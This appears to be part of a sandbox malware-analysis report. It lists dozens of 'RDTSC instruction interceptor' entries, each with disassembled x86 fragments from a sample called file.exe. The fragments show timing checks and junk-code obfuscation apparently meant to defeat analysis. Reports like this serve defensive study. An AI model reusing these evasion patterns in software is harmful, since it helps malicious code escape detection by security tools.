                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA070E second address: 4CA07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF624B4E7E4h 0x00000011 sub ecx, 3D890488h 0x00000017 jmp 00007FF624B4E7DBh 0x0000001c popfd 0x0000001d mov edx, eax 0x0000001f popad 0x00000020 mov eax, dword ptr [76FB65FCh] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF624B4E7E0h 0x0000002c or ch, FFFFFFE8h 0x0000002f jmp 00007FF624B4E7DBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FF624B4E7E8h 0x0000003b sbb cl, 00000048h 0x0000003e jmp 00007FF624B4E7DBh 0x00000043 popfd 0x00000044 popad 0x00000045 test eax, eax 0x00000047 jmp 00007FF624B4E7E6h 0x0000004c je 00007FF696DE198Ch 0x00000052 pushad 0x00000053 push ecx 0x00000054 mov di, D7C0h 0x00000058 pop edi 0x00000059 push ecx 0x0000005a push ebx 0x0000005b pop eax 0x0000005c pop edi 0x0000005d popad 0x0000005e mov ecx, eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA087E second address: 4CA08A8 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 mov edx, 0729C2C4h 0x0000000d pop edi 0x0000000e popad 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FF628F95B8Dh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FF624C75304h 0x00000021 pop ecx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08A8 second address: 4CA08E7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, A6B6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624B4E7E7h 0x0000000d mov dx, cx 0x00000010 pop eax 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c mov di, cx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08E7 second address: 4CA08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08F5 second address: 4CA08FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08FB second address: 4CA0901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50099 second address: 4C500A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500A8 second address: 4C5010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1C67AC0Ah 0x00000008 pushfd 0x00000009 jmp 00007FF624C752FBh 0x0000000e or eax, 5FC492AEh 0x00000014 jmp 00007FF624C75309h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and esp, FFFFFFF8h 0x00000020 jmp 00007FF624C752FEh 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF624C75307h 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5010A second address: 4C5010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5010F second address: 4C50166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9E88h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C752FEh 0x00000011 xchg eax, ecx 0x00000012 jmp 00007FF624C75300h 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov di, cx 0x0000001c mov dh, al 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FF624C75304h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF624C752FAh 0x0000002f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50166 second address: 4C5016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5016A second address: 4C50170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50170 second address: 4C50221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov dx, D9BCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007FF624B4E7DBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushad 0x00000018 call 00007FF624B4E7E2h 0x0000001d pop esi 0x0000001e mov ch, bh 0x00000020 popad 0x00000021 push eax 0x00000022 mov al, dh 0x00000024 pop esi 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FF624B4E7E0h 0x0000002e sbb ax, 6A68h 0x00000033 jmp 00007FF624B4E7DBh 0x00000038 popfd 0x00000039 call 00007FF624B4E7E8h 0x0000003e pushfd 0x0000003f jmp 00007FF624B4E7E2h 0x00000044 adc esi, 760667F8h 0x0000004a jmp 00007FF624B4E7DBh 0x0000004f popfd 0x00000050 pop ecx 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF624B4E7E2h 0x0000005a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50221 second address: 4C50233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50233 second address: 4C5025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E5h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5037A second address: 4C5037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5037E second address: 4C50384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50384 second address: 4C5038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5038A second address: 4C5038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5038E second address: 4C503CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FF624C75300h 0x00000013 test edx, 61000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503CB second address: 4C503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503CF second address: 4C503D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40787 second address: 4C4078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4078D second address: 4C40791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40791 second address: 4C407BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407BE second address: 4C407C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407C4 second address: 4C407C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407C8 second address: 4C407CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407CC second address: 4C40830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF624B4E7E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ch, CDh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FF624B4E7E5h 0x0000001a and esp, FFFFFFF8h 0x0000001d jmp 00007FF624B4E7DEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 movzx esi, dx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, ecx 0x00000030 mov dl, al 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov bl, cl 0x00000039 popad 0x0000003a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40830 second address: 4C40854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40854 second address: 4C40858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40858 second address: 4C4085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4085E second address: 4C4089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 pushfd 0x00000006 jmp 00007FF624B4E7DDh 0x0000000b adc cx, F436h 0x00000010 jmp 00007FF624B4E7E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624B4E7DCh 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4089A second address: 4C408C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C75305h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C408C1 second address: 4C40995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FF624B4E7DCh 0x00000012 mov ecx, 6C189271h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov ebx, 00000000h 0x00000022 jmp 00007FF624B4E7E4h 0x00000027 test esi, esi 0x00000029 pushad 0x0000002a movzx ecx, dx 0x0000002d call 00007FF624B4E7E3h 0x00000032 pushfd 0x00000033 jmp 00007FF624B4E7E8h 0x00000038 or cx, FC08h 0x0000003d jmp 00007FF624B4E7DBh 0x00000042 popfd 0x00000043 pop esi 0x00000044 popad 0x00000045 je 00007FF696E34215h 0x0000004b pushad 0x0000004c mov di, 7738h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushfd 0x0000005f jmp 00007FF624B4E7DBh 0x00000064 add ecx, 0AFAECFEh 0x0000006a jmp 00007FF624B4E7E9h 0x0000006f popfd 0x00000070 popad 0x00000071 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40995 second address: 4C40A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF624C752FCh 0x00000012 adc eax, 21847328h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f mov ax, di 0x00000022 pop ebx 0x00000023 popad 0x00000024 je 00007FF696F5ACC7h 0x0000002a jmp 00007FF624C752FEh 0x0000002f test byte ptr [76FB6968h], 00000002h 0x00000036 pushad 0x00000037 mov ax, 485Dh 0x0000003b mov bx, ax 0x0000003e popad 0x0000003f jne 00007FF696F5ACB6h 0x00000045 jmp 00007FF624C75304h 0x0000004a mov edx, dword ptr [ebp+0Ch] 0x0000004d jmp 00007FF624C75300h 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 mov bh, ah 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FF624C75309h 0x0000005d or esi, 1EA724B6h 0x00000063 jmp 00007FF624C75301h 0x00000068 popfd 0x00000069 mov cx, 0AA7h 0x0000006d popad 0x0000006e popad 0x0000006f push eax 0x00000070 pushad 0x00000071 movsx ebx, si 0x00000074 mov edx, ecx 0x00000076 popad 0x00000077 xchg eax, ebx 0x00000078 jmp 00007FF624C752FEh 0x0000007d xchg eax, ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007FF624C75307h 0x00000085 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A91 second address: 4C40ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DFh 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E1h 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40ABD second address: 4C40B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF624C752FEh 0x0000000f push dword ptr [ebp+14h] 0x00000012 jmp 00007FF624C75300h 0x00000017 push dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF624C752FAh 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B05 second address: 4C40B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B26 second address: 4C40B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007FF624C75306h 0x0000000d add esi, 62094E18h 0x00000013 jmp 00007FF624C752FBh 0x00000018 popfd 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B56 second address: 4C40B9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF624B4E7E8h 0x00000008 and ecx, 1545B878h 0x0000000e jmp 00007FF624B4E7DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF624B4E7E5h 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B9E second address: 4C40C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 98A2h 0x00000007 pushfd 0x00000008 jmp 00007FF624C75303h 0x0000000d sbb ah, FFFFFF9Eh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebx 0x0000001a jmp 00007FF624C752FEh 0x0000001f mov esp, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FF624C752FDh 0x0000002a sbb ax, 3E86h 0x0000002f jmp 00007FF624C75301h 0x00000034 popfd 0x00000035 mov ecx, 210AEC37h 0x0000003a popad 0x0000003b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DB3 second address: 4C50DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DB8 second address: 4C50DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DBE second address: 4C50DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DC2 second address: 4C50E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 9923h 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 pushfd 0x00000016 jmp 00007FF624C75302h 0x0000001b adc al, 00000068h 0x0000001e jmp 00007FF624C752FBh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E16 second address: 4C50E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E1C second address: 4C50E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75308h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E38 second address: 4C50E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E61 second address: 4C50E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BE0 second address: 4C50BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BE6 second address: 4C50C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov bx, 5CC2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75304h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC05E0 second address: 4CC05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC05E6 second address: 4CC068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FF624C75304h 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF624C752FEh 0x0000001e jmp 00007FF624C75305h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FF624C75300h 0x0000002a jmp 00007FF624C75305h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FF624C752FEh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF624C75307h 0x00000040 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC068C second address: 4CC0692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0692 second address: 4CC0696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0696 second address: 4CC069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC03C4 second address: 4CC044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FFh 0x00000009 or esi, 5D9865EEh 0x0000000f jmp 00007FF624C75309h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF624C75300h 0x0000001b or si, C568h 0x00000020 jmp 00007FF624C752FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FF624C75306h 0x0000002f mov ebp, esp 0x00000031 jmp 00007FF624C75300h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC044C second address: 4CC0469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601EC second address: 4C601F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601F2 second address: 4C601F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601F8 second address: 4C601FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601FC second address: 4C60236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E7h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60236 second address: 4C6025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75306h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6025C second address: 4C6027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF624B4E7DBh 0x00000012 pop eax 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC08DC second address: 4CC091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov edi, 42074EF8h 0x00000013 call 00007FF624C75301h 0x00000018 call 00007FF624C75300h 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC091C second address: 4CC0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E1h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0931 second address: 4CC096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624C752F9h 0x0000000d jmp 00007FF624C752FDh 0x00000012 push eax 0x00000013 jmp 00007FF624C75301h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
